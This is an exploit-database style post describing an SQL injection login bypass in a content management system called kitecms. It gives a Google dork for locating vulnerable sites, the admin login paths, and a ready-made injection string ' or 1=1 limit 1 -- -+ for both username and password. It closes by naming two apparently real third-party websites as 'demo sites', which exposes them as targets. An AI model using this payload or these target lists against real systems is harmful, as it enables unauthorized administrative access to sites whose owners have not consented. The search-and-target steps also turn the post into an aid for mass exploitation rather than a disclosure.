*********************************************************
#Exploit Title: kitecms -  Bypas Sql Login Vulnerability
#Date: 11-07-2022
#Exploit Author: Lutfie404
#Google Dork: intext:"Designed & Developed By Kite Infotech"
#The Login URL is: site.com/kitecms | site.com/admin 
#Category:webapps

*********************************************************
Proof of Concept:
Search google Dork: intext:"Designed & Developed By Kite Infotech"

access admin login at: site.com/kitecms | site.com/admin

Login With This Detail:
user: ' or 1=1 limit 1 -- -+ 
password: ' or 1=1 limit 1 -- -+

*********************************************************
### Demo Site :
http://ddyacreations.com/kitecms/
https://vestpharmaindia.com/kitecms/
